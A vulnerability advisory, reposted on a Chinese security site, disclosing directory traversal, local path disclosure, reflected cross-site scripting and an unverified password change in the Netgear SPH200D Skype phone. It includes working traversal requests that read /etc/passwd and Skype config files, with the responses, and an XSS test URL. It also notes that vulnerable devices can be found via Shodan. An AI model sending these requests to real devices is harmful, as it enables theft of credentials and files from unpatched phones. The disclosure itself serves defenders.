Netgear SPH200D多个安全漏洞

Netgear SPH200D多个安全漏洞

发布日期：2013-01-31
更新日期：2013-02-02

受影响系统：
Netgear SPH200D
描述：
--------------------------------------------------------------------------------
BUGTRAQ  ID: 57660
 
Netgear SPH200D是无线Skype网络电话。
 
Netgear SPH200D Firmware 1.0.4.80及其他版本存在目录遍历漏洞、跨站脚本漏洞、安全绕过漏洞，利用这些漏洞可允许攻击者窃取cookie认证信息、在浏览器上下文中执行任意脚本、绕过安全限制、执行未授权操作、访问本地文件和敏感信息。
 
<*来源：m-1-k-3
  *>

测试方法：
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！
Device Name: SPH200D
 Vendor: Netgear

 ============ Vulnerable Firmware Releases: ============

 Firmware Version : 1.0.4.80
 Kernel Version : 4.1-18
 Web Server Version : 1.5

 ============ Device Description: ============

 http://support.netgear.com/product/SPH200D

 ============ Shodan Torks ============

 Shodan Search: SPH200D
 => Results 337 devices

 ============ Vulnerability Overview: ============

 * directory traversal:

 Access local files of the device. You need to be authenticated or you have to find other methods for accessing the device.

 Request:
 http://192.168.178.103/../../etc/passwd

 Response:
 HTTP/1.0 200 OK
 Content-type: text/plain
 Expires: Sat, 24 May 1980.7:00:00.GMT
 Pragma: no-cache
 Server: simple httpd 1.0

 root:x:0:0:root:/root:/bin/bash
 demo:x:5000:100:Demo User:/home/demo:/bin/bash
 nobody:x:65534:65534:Nobody:/htdocs:/bin/bash

 

 If you request a directory you will get a very nice directory listing for browsing through the filesystem:
 /../../var/

 HTTP/1.0 200 OK
 Content-type: text/html
 Expires: Sat, 24 May 1980.7:00:00.GMT
 Pragma: no-cache
 Server: simple httpd 1.0

 <H1>Index of ../../var/</H1>

 <p><a href="/../../var/.">.</a></p>
 <p><a href="/../../var/..">..</a></p>
 <p><a href="/../../var/.Skype">.Skype</a></p>
 <p><a href="/../../var/jffs2">jffs2</a></p>
 <p><a href="/../../var/htdocs">htdocs</a></p>
 <p><a href="/../../var/cnxt">cnxt</a></p>
 <p><a href="/../../var/ppp">ppp</a></p>
 <p><a href="/../../var/conf">conf</a></p>
 <p><a href="/../../var/bin">bin</a></p>
 <p><a href="/../../var/usr">usr</a></p>
 <p><a href="/../../var/tmp">tmp</a></p>

 So with this information you are able to access the skype configuration with the following request:
 /../../var/.Skype/<user>/config.xml

 Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/LFI-01.preview.png

 * For changing the current password there is no request to the current password

 With this vulnerability an attacker is able to change the current password without knowing it. The attacker needs access to an authenticated browser.

 * local path disclosure:

 Request:
 http://192.168.178.103/%3C/

 Response:
 The requested URL '/var/htdocs/%3C/' was not found on this server.

 Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/local-path-disclosure.png

 * reflected Cross Site Scripting

 Appending scripts to the URL reveals that this is not properly validated for malicious input.
 http://192.168.178.102/network-dhcp.html4f951<script>alert(1)</script>e51c012502f

 Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/XSSed-IE6.png

 ============ Solution ============

 No known solution available.

 ============ Credits ============

 The vulnerability was discovered by Michael Messner
 Mail: devnull#at#s3cur1ty#dot#de
 Web: http://www.s3cur1ty.de
 Advisory URL: http://www.s3cur1ty.de/m1adv2013-002
 Twitter: @s3cur1ty_de

 ============ Time Line: ============

 August 2012 - discovered vulnerability
 07.08.2012 - reported vulnerability to Netgear
 08.08.2012 - case closed by Netgear
 29.01.2013 - public release

 ===================== Advisory end =====================

建议：
--------------------------------------------------------------------------------
厂商补丁：
 
Netgear
 -------
 目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：
 
http://support.netgear.com/product/SPH200D